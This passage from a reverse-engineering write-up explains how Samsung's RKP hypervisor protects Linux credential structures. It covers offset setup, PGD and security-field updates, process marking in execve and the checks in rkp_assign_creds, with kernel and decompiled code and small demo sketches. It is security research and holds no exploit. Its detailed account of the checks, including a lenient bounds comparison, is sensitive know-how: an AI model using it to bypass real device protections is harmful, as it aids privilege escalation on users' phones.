    cred.cred_task      = offsetof(struct task_struct,cred);
    cred.mm_task        = offsetof(struct task_struct,mm);
    cred.pid_task       = offsetof(struct task_struct,pid);
    cred.rp_task        = offsetof(struct task_struct,real_parent);
    cred.comm_task      = offsetof(struct task_struct,comm);
    cred.bp_cred_secptr     = rkp_get_offset_bp_cred();
    cred.verifiedbootstate = (u64)verifiedbootstate;
#ifdef CONFIG_SAMSUNG_PRODUCT_SHIP
    cred.selinux.ss_initialized_va  = (u64)&ss_initialized;
#endif
    uh_call(UH_APP_RKP, RKP_KDP_X40, (u64)&cred, 0, 0, 0);
}

rkp_get_task_sec_size, the first function called by kdp_init, simply returns the size of the task_security_struct structure.

▸ security/selinux/hooks.c

unsigned int rkp_get_task_sec_size(void)
{
    return sizeof(struct task_security_struct);
}

The second function, rkp_get_offset_bp_cred, returns the offset of its bp_cred field (the back-pointer to the credentials).

▸ security/selinux/hooks.c

unsigned int rkp_get_offset_bp_cred(void)
{
    return offsetof(struct task_security_struct,bp_cred);
}

The cred_init function is called from the start_kernel function.

▸ init/main.c

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    cred_init();
    // ...
}

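On the hypervisor side, the command is handled by rkp_cmd_cred_init, which calls rkp_cred_init.

rkp_cred_init allocates the rkp_cred structure, extracts the various offsets provided by the kernel, sanity-checks them, and stores them into that structure. It also stores whether the device is unlocked, and the physical address of the variable indicating whether SELinux is initialized.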

void rkp_cred_init(saved_regs_t* regs) {
  // ...

  // Allocate the `rkp_cred` structure that will hold all the offsets.
  rkp_cred = malloc(0xf0, 0);
  // Convert the VA of the kernel argument structure to a PA.
  cred = rkp_get_pa(regs->x2);
  // Ensure we're not calling this function multiple times.
  if (cred_inited == 1) {
    uh_log('L', "rkp_kdp.c", 1083, "Cannot initialized for Second Time\n");
    return;
  }
  // Extract the various fields of the kernel-provided structure.
  cred_inited = 1;
  credSize = cred->credSize;
  sp_size = cred->sp_size;
  uid_cred = cred->uid_cred;
  euid_cred = cred->euid_cred;
  gid_cred = cred->gid_cred;
  egid_cred = cred->egid_cred;
  usage_cred = cred->usage_cred;
  bp_pgd_cred = cred->bp_pgd_cred;
  bp_task_cred = cred->bp_task_cred;
  type_cred = cred->type_cred;
  security_cred = cred->security_cred;
  bp_cred_secptr = cred->bp_cred_secptr;
  // Ensure the offsets within a structure are not bigger than the structure total size.
  if (uid_cred > credSize || euid_cred > credSize || gid_cred > credSize || egid_cred > credSize ||
      usage_cred > credSize || bp_pgd_cred > credSize || bp_task_cred > credSize || type_cred > credSize ||
      security_cred > credSize || bp_cred_secptr > sp_size) {
    uh_log('L', "rkp_kdp.c", 1102, "RKP_9a19e9ca");
    return;
  }
  // Store the various fields into the corresponding global variables.
  rkp_cred->CRED_SIZE = cred->credSize;
  rkp_cred->SP_SIZE = sp_size;
  rkp_cred->CRED_UID_OFFSET = uid_cred >> 2;
  rkp_cred->CRED_EUID_OFFSET = euid_cred >> 2;
  rkp_cred->CRED_GID_OFFSET = gid_cred >> 2;
  rkp_cred->CRED_EGID_OFFSET = egid_cred >> 2;
  rkp_cred->TASK_PID_OFFSET = cred->pid_task >> 2;
  rkp_cred->TASK_CRED_OFFSET = cred->cred_task >> 3;
  rkp_cred->TASK_MM_OFFSET = cred->mm_task >> 3;
  rkp_cred->TASK_PARENT_OFFSET = cred->rp_task >> 3;
  rkp_cred->TASK_COMM_OFFSET = cred->comm_task >> 3;
  rkp_cred->CRED_SECURITY_OFFSET = security_cred >> 3;
  rkp_cred->CRED_BP_PGD_OFFSET = bp_pgd_cred >> 3;
  rkp_cred->CRED_BP_TASK_OFFSET = bp_task_cred >> 3;
  rkp_cred->CRED_FLAGS_OFFSET = type_cred >> 3;
  rkp_cred->SEC_BP_CRED_OFFSET = bp_cred_secptr >> 3;
  rkp_cred->MM_PGD_OFFSET = cred->pgd_mm >> 3;
  rkp_cred->CRED_USE_CNT = usage_cred >> 3;
  rkp_cred->VERIFIED_BOOT_STATE = 0;
  // Convert the VB state VA to a PA, and store the device unlock state in a global variable.
  vbs_va = cred->verifiedbootstate;
  if (vbs_va) {
    vbs_pa = check_and_convert_kernel_input(vbs_va);
    if (vbs_pa != 0) {
      rkp_cred->VERIFIED_BOOT_STATE = strcmp(vbs_pa, "orange") == 0;
    }
  }
  rkp_cred->SELINUX = rkp_get_pa(&cred->selinux);
  // For `ss_initialized`, convert the VA to a PA and store it into a global variable.
  rkp_cred->SS_INITIALIZED_VA = rkp_get_pa(cred->selinux.ss_initialized_va);
  uh_log('L', "rkp_kdp.c", 1147, "RKP_4bfa8993 %lx %lx %lx %lx");
}
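
The listing stores each offset divided by the width of the field (shifted right by 2 for 32-bit IDs, by 3 for 64-bit fields) and multiplies it back when accessing a field. The following sketch reproduces that pattern on a toy structure. All demo_ names are hypothetical, the structure is not the kernel's cred, and only two offsets are handled.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy stand-in for a kernel structure whose layout is reported at boot. */
struct demo_cred {
  uint32_t uid;
  uint32_t gid;
  uint64_t security;
};

/* Byte offsets as the kernel would send them. */
typedef struct {
  uint64_t size, id_off, ptr_off;
} demo_layout_t;

/* Scaled indices as the hypervisor would keep them. */
typedef struct {
  uint64_t size, id_idx, ptr_idx;
} demo_scaled_t;

/* Rejects offsets beyond the structure size, then stores scaled indices. */
bool demo_layout_store(const demo_layout_t* in, demo_scaled_t* out) {
  if (in->id_off > in->size || in->ptr_off > in->size) {
    return false;
  }
  out->size = in->size;
  out->id_idx = in->id_off >> 2;   /* 4-byte fields */
  out->ptr_idx = in->ptr_off >> 3; /* 8-byte fields */
  return true;
}

/* Reads a 32-bit field located at base + 4 * idx. */
uint32_t demo_read_u32(const void* base, uint64_t idx) {
  uint32_t v;
  memcpy(&v, (const char*)base + 4 * idx, sizeof(v));
  return v;
}

/* Reads a 64-bit field located at base + 8 * idx. */
uint64_t demo_read_u64(const void* base, uint64_t idx) {
  uint64_t v;
  memcpy(&v, (const char*)base + 8 * idx, sizeof(v));
  return v;
}
```

As in the listing, the comparison is a strict "greater than", so an offset exactly equal to the structure size passes the check.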

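PGD Change¶

When the kernel needs to set the PGD of a task_struct, it calls into the hypervisor, which also updates the back-pointer in the cred structure of the task.

On the kernel side, the PGD of a task can change in two places. The first one is exec_mmap, which calls the RKP_KDP_X43 command.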

▸ fs/exec.c

static int exec_mmap(struct mm_struct *mm)
{
    // ...
    if(rkp_cred_enable){
    uh_call(UH_APP_RKP, RKP_KDP_X43,(u64)current_cred(), (u64)mm->pgd, 0, 0);
    }
    // ...
}

The second one is the rkp_assign_pgd function, which calls the same command.

▸ kernel/fork.c

void rkp_assign_pgd(struct task_struct *p)
{
    u64 pgd;
    pgd = (u64)(p->mm ? p->mm->pgd :swapper_pg_dir);

    uh_call(UH_APP_RKP, RKP_KDP_X43, (u64)p->cred, (u64)pgd, 0, 0);
}

rkp_assign_pgd is called from copy_process, that is, when a process is being duplicated.

▸ kernel/fork.c

static __latent_entropy struct task_struct *copy_process(
                    unsigned long clone_flags,
                    unsigned long stack_start,
                    unsigned long stack_size,
                    int __user *child_tidptr,
                    struct pid *pid,
                    int trace,
                    unsigned long tls,
                    int node)
{
  // ...
    if(rkp_cred_enable)
        rkp_assign_pgd(p);
  // ...
}

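On the hypervisor side, the command is handled by rkp_cmd_pgd_assign, which simply calls rkp_pgd_assign.

rkp_pgd_assign calls rkp_phys_map_verify_cred to ensure that the structure provided by the kernel is a legitimate cred structure, before writing the new value of the bp_pgd field of the cred structure.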

void rkp_pgd_assign(saved_regs_t* regs) {
  // ...

  // Convert the VA of the cred structure into a PA.
  cred = rkp_get_pa(regs->x2);
  // The new PGD of the task is in register x3.
  pgd = regs->x3;
  // Verify that the credentials are valid and hypervisor-protected.
  if (rkp_phys_map_verify_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 146, "rkp_pgd_assign !!  %lx %lx %lx", cred, regs->x2, pgd);
    return;
  }
  // Update the bp_pgd field of the cred structure if the check passed.
  *(cred + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = pgd;
}

rkp_phys_map_verify_cred verifies that the pointer is aligned on the size of the cred structure and is marked as CRED in the physmap.

int64_t rkp_phys_map_verify_cred(uint64_t cred) {
  // ...

  // The credentials pointer must not be NULL.
  if (!cred) {
    return 1;
  }
  // It must be aligned on its expected size.
  if (cred != cred / CRED_BUFF_SIZE * CRED_BUFF_SIZE) {
    return 1;
  }
  rkp_phys_map_lock(cred);
  // It must be marked as `CRED` in the physmap.
  if (is_phys_map_cred(cred)) {
    uh_log('L', "rkp_kdp.c", 127, "physmap verification failed !!!!! %lx %lx %lx", cred, cred, cred);
    rkp_phys_map_unlock(cred);
    return 1;
  }
  rkp_phys_map_unlock(cred);
  return 0;
}

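Security Change¶

Similarly to the change of a task's PGD, the kernel also calls into the hypervisor to change the security field of the cred structure.

On the kernel side, this happens when a cred structure is being freed by the selinux_cred_free function. It calls the RKP_KDP_X45 command, but also calls rkp_free_security to free the task_security_struct structure.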

▸ security/selinux/hooks.c

static void selinux_cred_free(struct cred *cred)
{
    // ...
    if (rkp_ro_page((unsigned long)cred)) {
        uh_call(UH_APP_RKP, RKP_KDP_X45, (u64) &cred->security, 7, 0, 0);
    }
    // ...
    rkp_free_security((unsigned long)tsec);
    // ...
}

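rkp_free_security first calls chk_invalid_kern_ptr to check whether the pointer given as argument is a valid kernel pointer. It then calls rkp_ro_page and rkp_from_tsec_jar to ensure that it was allocated from the hypervisor-protected cache before calling kmem_cache_free (or kfree if it was not).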

▸ kernel/cred.c

void rkp_free_security(unsigned long tsec)
{
    if(!tsec || 
        chk_invalid_kern_ptr(tsec))
        return;

    if(rkp_ro_page(tsec) && 
        rkp_from_tsec_jar(tsec)){
        kmem_cache_free(tsec_jar,(void *)tsec);
    }
    else { 
        kfree((void *)tsec);
    }
}

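chk_invalid_kern_ptr checks whether the pointer starts with 0xffffffc, i.e. whether its upper 28 bits have that value, and returns non-zero if they do not.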

▸ kernel/cred.c

int chk_invalid_kern_ptr(u64 tsec) 
{
    return (((u64)tsec >> 36) != (u64)0xFFFFFFC);
}
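
To make the shift concrete, here is a standalone copy of the check with a few sample addresses. The function name demo_chk_invalid_kern_ptr and the sample values are made up for illustration; only the expression is taken from the listing above.

```c
#include <assert.h>
#include <stdint.h>

/* Returns non-zero when the upper 28 bits of `p` are not 0xFFFFFFC. */
int demo_chk_invalid_kern_ptr(uint64_t p) {
  /* Dropping the low 36 bits leaves the top 7 hexadecimal digits. */
  return (p >> 36) != 0xFFFFFFCULL;
}
```

The accepted range is therefore 0xffffffc000000000 through 0xffffffcfffffffff, a 64 GiB window. A user-space address such as 0x0000007fdeadbeef, or a kernel address outside this window such as 0xffffff8000000000, is reported as invalid.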

rkp_ro_page calls rkp_is_pg_protected, unless the address to check is that of init_cred or init_sec.

▸ include/linux/security.h

static inline u8 rkp_ro_page(unsigned long addr)
{
    if(!rkp_cred_enable)
        return (u8)0;
    if((addr == ((unsigned long)&init_cred)) || 
        (addr == ((unsigned long)&init_sec)))
        return (u8)1;
    else
        return rkp_is_pg_protected(addr);
}

Finally, rkp_from_tsec_jar gets the head page of the object, then the slab cache of that page, and returns whether it is the tsec_jar cache.

▸ kernel/cred.c

int rkp_from_tsec_jar(unsigned long addr)
{
    static void *objp;
    static struct kmem_cache *s;
    static struct page *page;

    objp = (void *)addr;
    if(!objp)
        return 0;
    page = virt_to_head_page(objp);
    s = page->slab_cache;
    if(s && s->name) {
        if(!strcmp(s->name,"tsec_jar")) {
            return 1;
        }
    }
    return 0;
}

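On the hypervisor side, the command is handled by rkp_cmd_cred_set_security, which calls rkp_cred_set_security.

rkp_cred_set_security gets the cred structure from the pointer to its security field, which is given as argument. It ensures that the structure is marked as CRED in the physmap before setting the security field to a poison value.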

int64_t* rkp_cred_set_security(saved_regs_t* regs) {
  // ...

  // Get the beginning of the cred structure from the pointer to its security field, and convert the VA into a PA.
  cred = rkp_get_pa(regs->x2 - 8 * rkp_cred->CRED_SECURITY_OFFSET);
  // Ensure the cred structure is marked as `CRED` in the physmap.
  if (is_phys_map_cred(cred)) {
    return uh_log('L', "rkp_kdp.c", 146, "invalidate_security: invalid cred !!!!! %lx %lx %lx", regs->x2,
                  regs->x2 - 8 * CRED_SECURITY_OFFSET, CRED_SECURITY_OFFSET);
  }
  // Convert the VA of the security field to a PA.
  security = rkp_get_pa(regs->x2);
  // Set the security field to the poison value 7 (remember that we are freeing the cred structure).
  *security = 7;
  return security;
}
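
Recovering the start of a structure from a pointer to one of its fields is a plain subtraction of the field offset, similar in spirit to the kernel's container_of macro. The sketch below shows the arithmetic on a toy structure; demo_cred and demo_cred_base are hypothetical, and the index is expressed in 8-byte units as in the listing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy structure with the security field at byte offset 16 (index 2). */
struct demo_cred {
  uint64_t usage;
  uint64_t type;
  uint64_t security;
};

/* Computes the structure base from the address of its security field. */
uintptr_t demo_cred_base(uintptr_t security_field, uint64_t security_idx) {
  return security_field - 8 * (uintptr_t)security_idx;
}
```

Because the field address comes from the caller, the computed base is only as trustworthy as the subsequent physmap check that it really is a CRED page.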

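Process Marking¶

Before diving into credentials changes, we must first explain the process marking performed by the hypervisor.

On the kernel side, it happens in the handler of the execve system call. The handler calls the RKP_KDP_X4B command, giving it the path of the binary being executed, to detect any violation. In addition, if the current task is root (checked with the CHECK_ROOT_UID macro) and the restrictions check on the binary being executed, performed by the rkp_restrict_fork function, fails, the system call returns immediately.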

▸ fs/exec.c

SYSCALL_DEFINE3(execve,
        const char __user *, filename,
        const char __user *const __user *, argv,
        const char __user *const __user *, envp)
{
    struct filename *path = getname(filename);
    int error = PTR_ERR(path);

    if(IS_ERR(path))
        return error;
    if(rkp_cred_enable){
        uh_call(UH_APP_RKP, RKP_KDP_X4B, (u64)path->name, 0, 0, 0);
    }
    if(CHECK_ROOT_UID(current) && rkp_cred_enable) {
        if(rkp_restrict_fork(path)){
            pr_warn("RKP_KDP Restricted making process. PID = %d(%s) "
                            "PPID = %d(%s)\n",
            current->pid, current->comm,
            current->parent->pid, current->parent->comm);
            putname(path);
            return -EACCES;
        }
    }
    putname(path);
    return do_execve(getname(filename), argv, envp);
}

The CHECK_ROOT_UID macro returns true if any of the UID, GID, EUID, EGID, SUID, or SGID is zero.

▸ fs/exec.c

#define CHECK_ROOT_UID(x) (x->cred->uid.val == 0 || x->cred->gid.val == 0 || \
            x->cred->euid.val == 0 || x->cred->egid.val == 0 || \
            x->cred->suid.val == 0 || x->cred->sgid.val == 0)

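The rkp_restrict_fork function ignores the /system/bin/patchoat and /system/bin/idmap2 binaries. It also ignores processes marked as "Linux on Dex", as checked by the rkp_is_lod macro. For processes marked as "non-root", as checked by the rkp_is_nonroot macro, the credentials are changed to those of the shell user (i.e. UID and GID 2000).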

▸ fs/exec.c

static int rkp_restrict_fork(struct filename *path)
{
    struct cred *shellcred;

    if (!strcmp(path->name, "/system/bin/patchoat") ||
        !strcmp(path->name, "/system/bin/idmap2")) {
        return 0;
    }
        /* If the Process is from Linux on Dex, 
        then no need to reduce privilege */
#ifdef CONFIG_LOD_SEC
    if(rkp_is_lod(current)){
            return 0;
        }
#endif
    if(rkp_is_nonroot(current)){
        shellcred = prepare_creds();
        if (!shellcred) {
            return 1;
        }
        shellcred->uid.val = 2000;
        shellcred->gid.val = 2000;
        shellcred->euid.val = 2000;
        shellcred->egid.val = 2000;
        commit_creds(shellcred);
    }
    return 0;
}

The rkp_is_nonroot macro checks whether bit 1 of the type field of the cred structure is set.

▸ fs/exec.c

#define rkp_is_nonroot(x) ((x->cred->type)>>1 & 1)

The rkp_is_lod macro checks whether bit 3 of the type field of the cred structure is set.

▸ fs/exec.c

#define rkp_is_lod(x) ((x->cred->type)>>3 & 1)

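Now we will take a look at the hypervisor side of process marking, to see when these two bits are set.

On the hypervisor side, the command issued from execve is handled by rkp_cmd_mark_ppt, which calls rkp_mark_ppt.

rkp_mark_ppt performs some sanity checks on the current task_struct and its cred structure, then changes bits of the type field:

it sets CRED_FLAG_MARK_PPT (bit 2) for adbd, app_process32, and app_process64;
it sets CRED_FLAG_LOD (bit 3) for nst;
it unsets CRED_FLAG_CHILD_PPT (bit 1) for idmap2 and patchoat.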

void rkp_mark_ppt(saved_regs_t* regs) {
  // ...

  // Get the current task_struct in the kernel.
  current_va = rkp_ns_get_current();
  // Convert the current task_struct VA into a PA.
  current_pa = rkp_get_pa(current_va);
  // Get the current cred structure from the current task_struct.
  current_cred = rkp_get_pa(*(current_pa + 8 * rkp_cred->TASK_CRED_OFFSET));
  // Get the binary path given as argument in register x2.
  name_va = regs->x2;
  // Convert the binary path VA into a PA.
  name_pa = rkp_get_pa(name_va);
  // Sanity-check: the values must be non NULL and the current cred must be marked as `CRED` in the physmap.
  if (!current_cred || !name_pa || rkp_phys_map_verify_cred(current_cred)) {
    uh_log('L', "rkp_kdp.c", 551, "rkp_mark_ppt NULL Cred OR filename %lx %lx %lx", current_cred, 0, 0);
  }
  // adbd, app_process32 and app_process64 are marked as `CRED_FLAG_MARK_PPT` (4).
  if (!strcmp(name_pa, "/system/bin/adbd") || !strcmp(name_pa, "/system/bin/app_process32") ||
      !strcmp(name_pa, "/system/bin/app_process64")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_MARK_PPT;
  }
  // nst is marked as `CRED_FLAG_LOD` (8, checked by `rkp_is_lod`).
  if (!strcmp(name_pa, "/system/bin/nst")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_LOD;
  }
  // idmap2 is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
  if (!strcmp(name_pa, "/system/bin/idmap2")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
  }
  // patchoat is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
  if (!strcmp(name_pa, "/system/bin/patchoat")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
  }
}
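
The marking logic boils down to a few bit operations keyed on the binary path. The following sketch reproduces it as a pure function over the type value. The flag values come from the comments in the listing above, while demo_mark_ppt is a hypothetical helper that omits the sanity checks and physical address conversions.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define CRED_FLAG_CHILD_PPT 2u /* bit 1, tested by rkp_is_nonroot */
#define CRED_FLAG_MARK_PPT 4u  /* bit 2 */
#define CRED_FLAG_LOD 8u       /* bit 3, tested by rkp_is_lod */

/* Returns the updated `type` value for a process executing `path`. */
uint64_t demo_mark_ppt(uint64_t type, const char* path) {
  if (!strcmp(path, "/system/bin/adbd") ||
      !strcmp(path, "/system/bin/app_process32") ||
      !strcmp(path, "/system/bin/app_process64")) {
    type |= CRED_FLAG_MARK_PPT;
  }
  if (!strcmp(path, "/system/bin/nst")) {
    type |= CRED_FLAG_LOD;
  }
  if (!strcmp(path, "/system/bin/idmap2") ||
      !strcmp(path, "/system/bin/patchoat")) {
    type &= ~(uint64_t)CRED_FLAG_CHILD_PPT;
  }
  return type;
}
```

Any other path leaves the flags untouched, so a process that already carries CRED_FLAG_CHILD_PPT keeps it across execve unless it runs idmap2 or patchoat.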

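Credentials Change¶

When the kernel needs to change the credentials of a task, it calls into the hypervisor, which performs extensive checks to detect privilege escalation attempts. Before diving into the hypervisor side, let's look at how a cred structure gets assigned to a task_struct.

cred structures are assigned in three places. The first one is the copy_creds function. Besides the comment noting that credentials are no longer shared among the threads of a thread group, we can see that the return value of the prepare_ro_creds function is assigned to the cred field of the task_struct.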

▸ kernel/cred.c

int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
    // ...
    /*
     * Disabling cred sharing among the same thread group. This
     * is needed because we only added one back pointer in cred.
     *
     * This should NOT in any way change kernel logic, if we think about what
     * happens when a thread needs to change its credentials: it will just
     * create a new one, while all other threads in the same thread group still
     * reference the old one, whose reference counter decreases by 2.
     */
    // ...
    if(rkp_cred_enable){
        p->cred = p->real_cred = prepare_ro_creds(new, RKP_CMD_COPY_CREDS, (u64)p);
        put_cred(new);
    }
    // ...
}

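The second one is the commit_creds function. It ensures that the new credentials are protected by the hypervisor by calling rkp_ro_page, before assigning the return value of the prepare_ro_creds function to the cred field of the current task_struct.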

▸ kernel/cred.c

int commit_creds(struct cred *new)
{
    if (rkp_ro_page((unsigned long)new))
        BUG_ON((rocred_uc_read(new)) < 1);
    else
        // ...
    if(rkp_cred_enable) {
        struct cred *new_ro;
        new_ro = prepare_ro_creds(new, RKP_CMD_CMMIT_CREDS, 0);
        rcu_assign_pointer(task->real_cred, new_ro);
        rcu_assign_pointer(task->cred, new_ro);
    } 
    else {
        // ...
    }
  // ...
    if (rkp_cred_enable){
        put_cred(new);
        put_cred(new);
    }
  // ...
}

The third one is the override_creds function. Once again, we can see a call to prepare_ro_creds before the return value is assigned to the cred field of the current task_struct.

▸ kernel/cred.c

#define override_creds(x) rkp_override_creds(&x)
const struct cred *rkp_override_creds(struct cred **cnew)
{
    // ...
    struct cred *new = *cnew;
    // ...
    if(rkp_cred_enable) {
        volatile unsigned int rkp_use_count = rkp_get_usecount(new);
        struct cred *new_ro;

        new_ro = prepare_ro_creds(new, RKP_CMD_OVRD_CREDS, rkp_use_count);
        *cnew = new_ro;
        rcu_assign_pointer(current->cred, new_ro);
        put_cred(new);
    }
    else {
        // ...
    }
    // ...
}

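prepare_ro_creds allocates a new read-only cred structure from the cred_jar_ro cache. We saw in the "Credentials Protection" section that new fields were added to this structure. In particular, the use_cnt field (the reference count of the cred structure) needs to be modified often. To get around this, a pointer to a read-write structure containing the reference count is stored in the read-only cred structure. prepare_ro_creds therefore also allocates the new read-write reference count. It then allocates a new read-only task_security_struct from the tsec_jar cache.

It uses the rkp_cred_fill_params macro and calls the RKP_KDP_X46 command to let the hypervisor perform its verifications and copy the data from the read-write version of the cred structure (the argument) to the read-only version (the newly allocated one). prepare_ro_creds finally performs some sanity checks, which depend on where it was called from, before returning the read-only version of the cred structure.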

▸ kernel/cred.c

static struct cred *prepare_ro_creds(struct cred *old, int kdp_cmd, u64 p)
{
    u64 pgd =(u64)(current->mm?current->mm->pgd:swapper_pg_dir);
    struct cred *new_ro;
    void *use_cnt_ptr = NULL;
    void *rcu_ptr = NULL;
    void *tsec = NULL;
    cred_param_t cred_param;
    new_ro = kmem_cache_alloc(cred_jar_ro, GFP_KERNEL);
    if (!new_ro)
        panic("[%d] : kmem_cache_alloc() failed", kdp_cmd);

    use_cnt_ptr = kmem_cache_alloc(usecnt_jar,GFP_KERNEL);
    if (!use_cnt_ptr)
        panic("[%d] : Unable to allocate usage pointer\n", kdp_cmd);
    rcu_ptr = get_usecnt_rcu(use_cnt_ptr);
    ((struct ro_rcu_head*)rcu_ptr)->bp_cred = (void *)new_ro;
    tsec = kmem_cache_alloc(tsec_jar, GFP_KERNEL);
    if (!tsec)
        panic("[%d] : Unable to allocate security pointer\n", kdp_cmd);
    rkp_cred_fill_params(old,new_ro,use_cnt_ptr,tsec,kdp_cmd,p);
    uh_call(UH_APP_RKP, RKP_KDP_X46, (u64)&cred_param, 0, 0, 0);
    if (kdp_cmd == RKP_CMD_COPY_CREDS) {
        if ((new_ro->bp_task != (void *)p) 
            || new_ro->security != tsec 
            || new_ro->use_cnt != use_cnt_ptr) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#", kdp_cmd, new_ro->bp_task,(void *)p,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr);
        }
    }
    else {
        if ((new_ro->bp_task != current)||
            (current->mm 
            && new_ro->bp_pgd != (void *)pgd) ||
            (new_ro->security != tsec) ||
            (new_ro->use_cnt != use_cnt_ptr)) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#, pgd=#%p:%p#", kdp_cmd, new_ro->bp_task,current,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr,new_ro->bp_pgd,(void *)pgd);
        }
    }
    rocred_uc_set(new_ro, 2);
    set_cred_subscribers(new_ro, 0);
    get_group_info(new_ro->group_info);
    get_uid(new_ro->user);
    get_user_ns(new_ro->user_ns);
#ifdef CONFIG_KEYS
    key_get(new_ro->session_keyring);
    key_get(new_ro->process_keyring);
    key_get(new_ro->thread_keyring);
    key_get(new_ro->request_key_auth);
#endif
    validate_creds(new_ro);
    return new_ro;
}
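
The split between an immutable cred and a mutable reference count, as described for prepare_ro_creds, can be pictured with a const structure that holds a pointer to a writable counter. This is only a user-space analogy: demo_ro_cred and the two helpers are hypothetical, and C's const qualifier stands in for the page-level protection enforced by the hypervisor.

```c
#include <assert.h>

/* The structure itself is treated as read-only; the counter it points to is not. */
struct demo_ro_cred {
  unsigned int uid;
  int* use_cnt;
};

/* Takes a reference without writing to the structure itself. */
int demo_get_cred(const struct demo_ro_cred* c) {
  return ++*c->use_cnt;
}

/* Drops a reference without writing to the structure itself. */
int demo_put_cred(const struct demo_ro_cred* c) {
  return --*c->use_cnt;
}
```

Both helpers accept a pointer to a const structure, yet they can still update the count because only the pointer is stored in the protected object. This is the same indirection that keeps get_cred and put_cred style operations from requiring a hypervisor call on every use.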

The rkp_cred_fill_params macro simply fills the fields of the cred_param_t structure that is given as argument to the RKP command.

▸ include/linux/cred.h

typedef struct cred_param{
    struct cred *cred;
    struct cred *cred_ro;
    void *use_cnt_ptr;
    void *sec_ptr;
    unsigned long type;
    union {
        void *task_ptr;
        u64 use_cnt;
    };
}cred_param_t;

▸ include/linux/cred.h

#define rkp_cred_fill_params(crd,crd_ro,uptr,tsec,rkp_cmd_type,rkp_use_cnt) \
do {                        \
    cred_param.cred = crd;      \
    cred_param.cred_ro = crd_ro;        \
    cred_param.use_cnt_ptr = uptr;      \
    cred_param.sec_ptr= tsec;       \
    cred_param.type = rkp_cmd_type;     \
    cred_param.use_cnt = (u64)rkp_use_cnt;      \
} while(0)

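On the hypervisor side, the command is handled by the rkp_cmd_assign_creds function, which calls rkp_assign_creds.

rkp_assign_creds performs many checks, which can be summarized as follows (where "current" refers to the cred structure of the current task, "old" to the read-write cred structure, and "new" to the read-only cred structure):

the integrity of the current back-pointers is checked;
the old cred structure must be protected by the hypervisor;
for a current task that is not "Linux on Dex",

    if its IDs are not LOD-prefixed and the device is locked, rkp_check_pe and from_zyg_adbd are called to detect privilege escalation;
    if its IDs are LOD-prefixed, the current task is marked CRED_FLAG_LOD;

check_privilege_escalation is called for each UID, EUID, GID, and EGID pair of the old and current tasks, to detect privilege escalation;
the old cred structure is copied into the new one, and its use_cnt field is set;
for callers other than copy_creds, the back-pointers of the new cred structure are set from the current task;
for override_creds callers, the new cred structure is marked CRED_FLAG_ORPHAN if the use count given as argument is less than or equal to 1, and unmarked otherwise;
for copy_creds callers, the back-pointers are set from the task being copied;
the new task_security_struct must be protected by the hypervisor;
if RKP is deferred-initialized, the old SID cannot be less than 20 if the new SID is greater than 20;
the old task_security_struct is copied into the new task_security_struct, and its back-pointer is set accordingly;
if the device is locked and the parent of the current task is marked CRED_FLAG_MARK_PPT, the new task is marked CRED_FLAG_MARK_PPT as well.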
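
The "LOD-prefixed" test mentioned in the summary compares the upper 16 bits of each ID against 0x61a8. The sketch below isolates that comparison before the full listing; the demo_ helper names are hypothetical, and the mask and prefix values are the ones used by rkp_assign_creds.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define DEMO_LOD_PREFIX 0x61a80000u

/* Returns true if the upper 16 bits of `id` carry the LOD prefix. */
bool demo_has_lod_prefix(uint32_t id) {
  return (id & 0xffff0000u) == DEMO_LOD_PREFIX;
}

/* Returns true if at least one of the four IDs is LOD-prefixed. */
bool demo_any_lod_prefix(uint32_t uid, uint32_t euid, uint32_t gid, uint32_t egid) {
  return demo_has_lod_prefix(uid) || demo_has_lod_prefix(euid) ||
         demo_has_lod_prefix(gid) || demo_has_lod_prefix(egid);
}
```

When demo_any_lod_prefix would return false, the hypervisor takes the rkp_check_pe and from_zyg_adbd path on locked devices; when it would return true, the current task is marked CRED_FLAG_LOD instead.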

void rkp_assign_creds(saved_regs_t* regs) {
  // ...

  // Convert the VA of the argument structure to a PA.
  cred_param = rkp_get_pa(regs->x2);
  if (!cred_param) {
    uh_log('L', "rkp_kdp.c", 662, "NULL pData");
    return;
  }
  // Get the current task_struct in the kernel.
  curr_task_va = rkp_ns_get_current();
  // Convert the current task_struct VA into a PA.
  curr_task = rkp_get_pa(curr_task_va);
  // Get the current cred structure from the current task_struct.
  curr_cred_va = *(curr_task + 8 * rkp_cred->TASK_CRED_OFFSET);
  // Convert the current cred structure VA into a PA.
  curr_cred = rkp_get_pa(curr_cred_va);
  // Get the target RW cred from the argument structure and convert it from a VA to a PA.
  targ_cred = rkp_get_pa(cred_param->cred);
  // Get the target RO cred from the argument structure and convert it from a VA to a PA.
  targ_cred_ro = rkp_get_pa(cred_param->cred_ro);
  // Get the current task_security_struct from the current cred structure.
  curr_secptr_va = *(curr_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
  // Convert the current task_security_struct from a VA to a PA.
  curr_secptr = rkp_get_pa(curr_secptr_va);
  // Sanity-check: the current cred structure must be non NULL.
  if (!curr_cred) {
    uh_log('L', "rkp_kdp.c", 489, "\nCurrent Cred is NULL %lx %lx %lx\n ", curr_task, curr_task_va, 0);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_task, 0);
  }
  // Sanity-check: the current task_security_struct must be non NULL, or RKP must not be deferred initialized.
  if (!curr_secptr && rkp_deferred_inited) {
